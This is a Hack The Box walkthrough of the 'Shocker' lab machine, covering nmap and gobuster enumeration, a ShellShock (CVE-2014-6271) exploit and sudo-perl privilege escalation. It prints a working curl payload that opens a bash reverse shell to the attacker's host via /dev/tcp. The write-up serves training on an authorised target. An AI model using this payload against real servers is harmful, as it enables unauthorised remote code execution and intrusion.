Hack The Box - Shocker Walkthrough without Metasploit

Shocker: a Linux box rated as easy. Using different enumeration techniques and a common bash vulnerability we will be able to enter, there we will escalate privileges abusing some privileged binary.

Enumeration

First we will run nmap (or in our case nmapAutomator.sh a script to make some basic enumeration on the target). We can see two ports open 80 (Http) and 2222 (SSH).

nmapAutomator.sh 10.10.10.56 All

                Or
                
nmap -sC -sV 10.10.10.56

Since we have port 80 (Http) open we are going to run Gobuster:

We ran gobuster with the options dir -u (url) -w (wordlist) -t (threads), since we are on a pentesting platform and not in the real world we can use 40 threads.

gobuster dir -u 10.10.10.56 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 40

We tried another wordlist, this time we use the big.txt from /usr/share/dirb/wordlists of our kali machine, here we found index.html and /cgi-bin/

Since we found a cgi-bin folder we will ran Gobuster again, this time with new flags:

-x to indicate extensions to look for

-e to show full path

gobuster dir -u http://10.10.10.56:80/cgi-bin/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 20 -x php,db,txt,html,sh -e

This output is really interesting, there is a script file on cgi-bin, which means we can attempt a ShellShock attack.

Exploitation

We are going to perform a ShellShock attack CVE 2014-6271, this is a Bash vulnerability that allows RCE (Remote Code Execution) without confirmation. Windows is completely safe from this vulnerability, but since a great percentage of internet is on Apache servers, and the majority of those run on Linux (just like our victim does)...

We send a series of random characters to confuse Bash: (){ :; };

Since Bash is confused and doesn't know what to do with those characters it will, by default, execute the code after them, so we will execute a bash reverse shell.

With that in mind we send a curl to our victim:

curl -H "user-agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/<our-ip>/port 0>&1'" http://10.10.10.56/cgi-bin/user.sh

Privilege Escalation

Once we are inside we proceed to enumerate again, this time from within the box, our very first command gives us some great results, trying to see if we can run some commands with sudo -l

With this information we go to GTFOBins

And search for perl:

Since we can run /usr/bin/perl as root with sudo:

Pwnd

Since the box has Python3 we can spawn a tty shell with it:

python3 -c 'import pty;pty.spawn("/bin/bash")'

PreviousHack The Box - Lame Walkthrough without MetasploitNextHack The Box - Doctor Walkthrough without Metasploit

Last updated